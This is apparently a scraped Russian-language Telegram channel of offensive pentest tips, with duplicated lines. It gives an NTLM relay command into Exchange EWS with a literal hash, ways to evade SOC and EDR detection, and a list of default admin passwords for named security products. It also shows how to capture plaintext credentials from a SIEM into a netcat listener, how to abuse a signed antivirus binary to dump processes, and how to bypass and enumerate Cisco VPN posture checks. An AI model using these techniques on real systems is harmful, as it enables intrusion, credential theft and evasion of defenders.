деревенский pass the hash в exchange ews:
- запускаем ntlmrelayx с моим модулем ntlmrelayx.py -smb2support -t https://exchange.com/EWS/exchange.asmx --ews --folder inbox
- в другой консоли на том же сервере smbclient.py domain/user@ipсервера -hashes :13B29964CC2480B4EF454C59562E675C
сами к себе вызываем netntlm аутентификацию с хэшем ntlm и перенаправляем на ews.
Готовых инструментов не видел, за неимением инструмента можно поступить таким образом. Есть mimkatz, но нужна винда и т.д.
- запускаем ntlmrelayx с моим модулем ntlmrelayx.py -smb2support -t https://exchange.com/EWS/exchange.asmx --ews --folder inbox
- в другой консоли на том же сервере smbclient.py domain/user@ipсервера -hashes :13B29964CC2480B4EF454C59562E675C
сами к себе вызываем netntlm аутентификацию с хэшем ntlm и перенаправляем на ews.
Готовых инструментов не видел, за неимением инструмента можно поступить таким образом. Есть mimkatz, но нужна винда и т.д.
🔥5
бортжурнал про обход обнаружения SOCами (и некоторыми Антивирусными решениями) impacket wmiexec.py (очень-очень лайтово) - читать
Telegraph
бортжурнал про обход обнаружения SOCами impacket wmiexec.py
wmiexec из пакета impacket позволяет выполнять команды на удаленной windows машине. Данный скрипт генерирует в системе события: 1)удаленный сетевой вход по протоколу smb - eventid 4624 logontype 3; доступ на сетевую шару - eventid 5145 2)создание wmi подписки…
🔥7
true_security
list.png
Media is too big
VIEW IN TELEGRAM
Видео с демонстрацией к посту)
Как подсказал добрый человек, способ уже давно известен и утилита https://github.com/dafthack/MailSniper умеет в эту историю через ключ OtherUserMailbox
Как подсказал добрый человек, способ уже давно известен и утилита https://github.com/dafthack/MailSniper умеет в эту историю через ключ OtherUserMailbox
🔥9👎1
Классная статья по созданию профиля для cobalt strike с обходом детектов: https://whiteknightlabs.com/2023/05/23/unleashing-the-unseen-harnessing-the-power-of-cobalt-strike-profiles-for-edr-evasion/
Староватое уже, но для понимания полезное
Староватое уже, но для понимания полезное
Крутая тулза для организации socks через rdp соединение, работает практически без детектов. https://github.com/nccgroup/SocksOverRDP
Обратить внимание на строку:
#define SocksOverRDP_CHANNEL_NAME "SocksChannel"
Ну вы поняли☺️
Обратить внимание на строку:
#define SocksOverRDP_CHANNEL_NAME "SocksChannel"
Ну вы поняли☺️
GitHub
GitHub - nccgroup/SocksOverRDP: Socks5/4/4a Proxy support for Remote Desktop Protocol / Terminal Services / Citrix / XenApp / XenDesktop
Socks5/4/4a Proxy support for Remote Desktop Protocol / Terminal Services / Citrix / XenApp / XenDesktop - nccgroup/SocksOverRDP
👍6
Интересный способ закрепа в статье https://ipurple.team/2024/01/03/scheduled-task-tampering/ и сама утилита: https://github.com/netero1010/GhostTask
+ а что будет если заменять бинарь? например в таске office automatic updates 2.0?:) или вообще в каталог с бинарем из таски обновления офиса положить свою proxydll с именем msvcp120.dll/msvcp140.dll/msvcr120.dll ?:)
А если изменить в реестре ключ существующей задачи?:)
+ а что будет если заменять бинарь? например в таске office automatic updates 2.0?:) или вообще в каталог с бинарем из таски обновления офиса положить свою proxydll с именем msvcp120.dll/msvcp140.dll/msvcr120.dll ?:)
А если изменить в реестре ключ существующей задачи?:)
Purple Team
Scheduled Task Tampering
The HAFNIUM threat actor is using an unconventional method to tamper scheduled tasks in order to establish persistence via modification of registry keys in their malware called Tarrask. The benefit…
❤1🔥1
на пентестах бывают случаи когда компрометация происходит через средства обнаружения атак и средства защиты....далеко не все фильтруют сетевой доступ к компонентам СЗИ.
Так сказать, спасибо за дефолтные пароли:
Докидывайте дефолтные пароли сзи в комментах)
Так сказать, спасибо за дефолтные пароли:
- rvision soar/deception/etc... ssh root:pxtm0222; postgres rvision:pxtm0222
- maxpatrol VM: Administrator:P@ssw0rd
- maxpatrol siem: Administrator:P@ssw0rd; rabbitmq: siem:P@ssw0rd или mpx_siem:P@ssw0rd
- pt xdr: Administrator:P@ssw0rd
- pt nad: administrator:P0sitive или administrator:Administr@t0r
- security vision soar: postgres postgres:1q2w#E$R; postgres:sv5platform; rabbitmq sv5_user:sv5platform
- kuma (kaspersky siem): admin:mustB3Ch@ng3d!
Докидывайте дефолтные пароли сзи в комментах)
👍17🔥6
Не реклама, но это очень классные каналы с sans(свежим) и т.д.
https://news.1rj.ru/str/joinchat/WvQZlNhxGF1mNjRk
https://news.1rj.ru/str/+ObUEL3Wz7msyMWZh
https://news.1rj.ru/str/joinchat/WvQZlNhxGF1mNjRk
https://news.1rj.ru/str/+ObUEL3Wz7msyMWZh
Telegram
RedBlueTM Hit
@RedBlueHit is a special place for those want become expert in InfoSec
DCMA => Send email from your company or personal domain + Telegram links you want we delete to no-reply@vip.hide01.ir
Removal will takes 24 hours.
Website: hide01.ir
Owner: @Hide01
DCMA => Send email from your company or personal domain + Telegram links you want we delete to no-reply@vip.hide01.ir
Removal will takes 24 hours.
Website: hide01.ir
Owner: @Hide01
У некоторых возникают вопросы, а что даст доступ к определенным средствам защиты в режиме администратора?
начнем с pt vm: как правило, интеграторы и другие вредренцы ленятся тонко настраивать учетные записи в ad для проведения аудитов и дают либо права локального администратора либо вовсе админа домена учетке которую использует сканер. В mp vm есть возможность выполнять powershell команды на аудируемых устройствах, чем собственно вы можете воспользоваться. Создать новую задачу, указать цель, выбрать учетную запись и поехали.
что же касается pt siem: из-за той же самой лени или проблем с руками некоторые дают широкие права учеткам сбора событий. Команды выполнять не получится, пароль учетных записей не посмотреть в веб интерфейсе. Но существует возможность перехватить пароль учетной записи:
- создать новую задачу с профилем Web API Audit
- указать интересующую учетную запись
- ip адрес и порт своего сервера
у себя запустить nc -lvp "порт" и в сиеме запустить задачу. В nc получите креды учетки в открытом виде. С данными кредами у вас намного больше шансов в инфре заказчика. P.S. Это не говоря о паролях в командах и параметрах, если логируют eventid 4688 или 1 (sysmon)
P.s.2. Это не косяки продуктов, это косяки тех кто не меняет пароли и не ограничивает доступ.
начнем с pt vm: как правило, интеграторы и другие вредренцы ленятся тонко настраивать учетные записи в ad для проведения аудитов и дают либо права локального администратора либо вовсе админа домена учетке которую использует сканер. В mp vm есть возможность выполнять powershell команды на аудируемых устройствах, чем собственно вы можете воспользоваться. Создать новую задачу, указать цель, выбрать учетную запись и поехали.
что же касается pt siem: из-за той же самой лени или проблем с руками некоторые дают широкие права учеткам сбора событий. Команды выполнять не получится, пароль учетных записей не посмотреть в веб интерфейсе. Но существует возможность перехватить пароль учетной записи:
- создать новую задачу с профилем Web API Audit
- указать интересующую учетную запись
- ip адрес и порт своего сервера
у себя запустить nc -lvp "порт" и в сиеме запустить задачу. В nc получите креды учетки в открытом виде. С данными кредами у вас намного больше шансов в инфре заказчика. P.S. Это не говоря о паролях в командах и параметрах, если логируют eventid 4688 или 1 (sysmon)
P.s.2. Это не косяки продуктов, это косяки тех кто не меняет пароли и не ограничивает доступ.
❤6🔥2😁2
Сегодня в одном чате ребята обсуждали написание статьи про Lolbins.
Вот вам один интересный lolbas - C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\kldumper.exe
описание - https://support.kaspersky.ru/common/diagnostics/7641
преза от ЛК, где предлагается сигма правило с исключением данного бинаря из сработки по дампу lsass - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf
у kldumper.exe цифровая подпись ЛК. lsass им не дампил еще, но другие процессы дампит ок (при наличии прав лок админа)
Вот вам один интересный lolbas - C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\kldumper.exe
описание - https://support.kaspersky.ru/common/diagnostics/7641
преза от ЛК, где предлагается сигма правило с исключением данного бинаря из сработки по дампу lsass - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf
у kldumper.exe цифровая подпись ЛК. lsass им не дампил еще, но другие процессы дампит ок (при наличии прав лок админа)
👍1
Иногда для lpe на винде при определённых условиях нужен перезапуск служб/ребут ос. Прав на это нет, но может помочь https://github.com/peewpw/Invoke-BSOD/blob/master/Invoke-BSOD.ps1
Бсодит винду без прав админа, не детектится антивирусами.
Бсодит винду без прав админа, не детектится антивирусами.
GitHub
Invoke-BSOD/Invoke-BSOD.ps1 at master · peewpw/Invoke-BSOD
For when you want a computer to be done - without admin! - peewpw/Invoke-BSOD
👏10👍2
true_security
Сегодня в одном чате ребята обсуждали написание статьи про Lolbins. Вот вам один интересный lolbas - C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\kldumper.exe описание - https://support.kaspersky.ru/common/diagnostics/7641 преза от ЛК, где предлагается…
kldumper.exe
4 MB
утилиты для дампа памяти процесса. с подписью антивирусов avg,avast,kaspersky
👍10
Forwarded from Юрий Строжевский
Выложил свой код для получения Windows Extended Rights на GitHub: https://github.com/YuryStrozhevsky/extendedRights
GitHub
GitHub - YuryStrozhevsky/extendedRights: How to retrive all information about Windows Extended Rights via LDAP
How to retrive all information about Windows Extended Rights via LDAP - YuryStrozhevsky/extendedRights
👍1
hostscan2.png
234.9 KB
Иногда при пентесте есть валидные креды + есть cisco vpn с модулем hostscan.
Модуль Hostscan используют для проведения проверок на подключаемых устройствах, например что устройство корпоративное (введенно в домен), есть антивирус, стоят обновления и т.д.
Но что делать простому пентестеру если в инфру все таки хочется?
перейти по адресу: https://адрес/CACHE/sdesktop/data.xml и если нам повезет увидеть проводимые модулем hostscan проверки, как на скрине.
что делать если файла нет а проверки есть? запустить process monitor с фильтром на "process name=cscan.exe" и подключиться через клиент anyconnect, ввести любые креды и смотреть что делает приложение.
Изначально приложение соберет информацию об ОС, обновлениях и тд. После ввода любых кред оно начнет "ту самую" проверку(смотреть скрин 2).
Что нам остается делать? правильно - выполнить условия проверки)) имя windows ad домена можно найти, файлы и каталоги можно создать.
Информация не новшество, но пока не столкнешься - не вспомнишь.
Есть ньюанс с проверкой наличия процесса, тут еще нужно подумать.
Модуль Hostscan используют для проведения проверок на подключаемых устройствах, например что устройство корпоративное (введенно в домен), есть антивирус, стоят обновления и т.д.
Но что делать простому пентестеру если в инфру все таки хочется?
перейти по адресу: https://адрес/CACHE/sdesktop/data.xml и если нам повезет увидеть проводимые модулем hostscan проверки, как на скрине.
что делать если файла нет а проверки есть? запустить process monitor с фильтром на "process name=cscan.exe" и подключиться через клиент anyconnect, ввести любые креды и смотреть что делает приложение.
Изначально приложение соберет информацию об ОС, обновлениях и тд. После ввода любых кред оно начнет "ту самую" проверку(смотреть скрин 2).
Что нам остается делать? правильно - выполнить условия проверки)) имя windows ad домена можно найти, файлы и каталоги можно создать.
Информация не новшество, но пока не столкнешься - не вспомнишь.
Есть ньюанс с проверкой наличия процесса, тут еще нужно подумать.
👍9👎1
Продолжаем эпопею с cisco vpn.
Есть такая штука как скрытые группы, это группы различных устройств, админские, тестовые и т.п. В данных группах могут быть более широкие доступы. Эти группы не отображаются при подключении и можно к ним подключиться только явно указав в строке подключения клиента, например vpn.company.ru/test_users. К тому же, некоторые компании скрывают вообще веб-интерфейс входа в cisco vpn.
К счастью, название этих групп можно определить перебором. Для определения группы достаточно отправить Post запрос к корню cisco vpn и если код ответа будет равен 200, то профиль существует.
Запрос:
POST /test HTTP/1.1 где test название группы. При наличии группы, в ответе будет содержимое:
<html><noscript>document.location.replace('/+CSCOE+/logon.html?tgroup=test')</noscript></html>
Пример результатов перебора на скриншоте, было получено скрытое из интерфейса имя группы test. Зная имена скрытых групп, можно попробовать атаки методом брутфорса/спрея или проверить возможность входа в vpn с использованием тех учетных записей, которые у вас уже есть.
Есть такая штука как скрытые группы, это группы различных устройств, админские, тестовые и т.п. В данных группах могут быть более широкие доступы. Эти группы не отображаются при подключении и можно к ним подключиться только явно указав в строке подключения клиента, например vpn.company.ru/test_users. К тому же, некоторые компании скрывают вообще веб-интерфейс входа в cisco vpn.
К счастью, название этих групп можно определить перебором. Для определения группы достаточно отправить Post запрос к корню cisco vpn и если код ответа будет равен 200, то профиль существует.
Запрос:
POST /test HTTP/1.1 где test название группы. При наличии группы, в ответе будет содержимое:
<html><noscript>document.location.replace('/+CSCOE+/logon.html?tgroup=test')</noscript></html>
Пример результатов перебора на скриншоте, было получено скрытое из интерфейса имя группы test. Зная имена скрытых групп, можно попробовать атаки методом брутфорса/спрея или проверить возможность входа в vpn с использованием тех учетных записей, которые у вас уже есть.
🔥7👍3
temp.txt
421 B
маленький пример списка для енума, все зависит от вашей фантазии. Можно взять список групп который вам виден и к ним добавить "-test", можно взять название компании и сокращения добавляя префиксы it,test,admin и т.д.
🔥6
Опять таки про cisco vpn...
наблюдаю историю когда за одним доменом vpn.company.ru находятся две разные cisco asa c разными настройками.
- У каждой асы свой ssl сертификат, в котором раскрывается серийный номер в поле subject: serialNumber.
- При двух одинаковых get запросах serialNumber разный в ответе....т.е. циски реально две.
- У домена vpn.company.ru две А записи с разными ip адресами.
Одна из цисок запускает модуль posture, а другая нет. То есть одна нас впускает в инфраструктуру без проверок. Как то так случилось что админы настроили циски по разному.
наблюдаю историю когда за одним доменом vpn.company.ru находятся две разные cisco asa c разными настройками.
- У каждой асы свой ssl сертификат, в котором раскрывается серийный номер в поле subject: serialNumber.
- При двух одинаковых get запросах serialNumber разный в ответе....т.е. циски реально две.
- У домена vpn.company.ru две А записи с разными ip адресами.
Одна из цисок запускает модуль posture, а другая нет. То есть одна нас впускает в инфраструктуру без проверок. Как то так случилось что админы настроили циски по разному.
👍2
поискал в интернетах чужие проверки posture hostscan, самые упоротые в amazon. Что люди только не проверяют ) как можно заметить, меньше всего проверок на linux и macos
👍3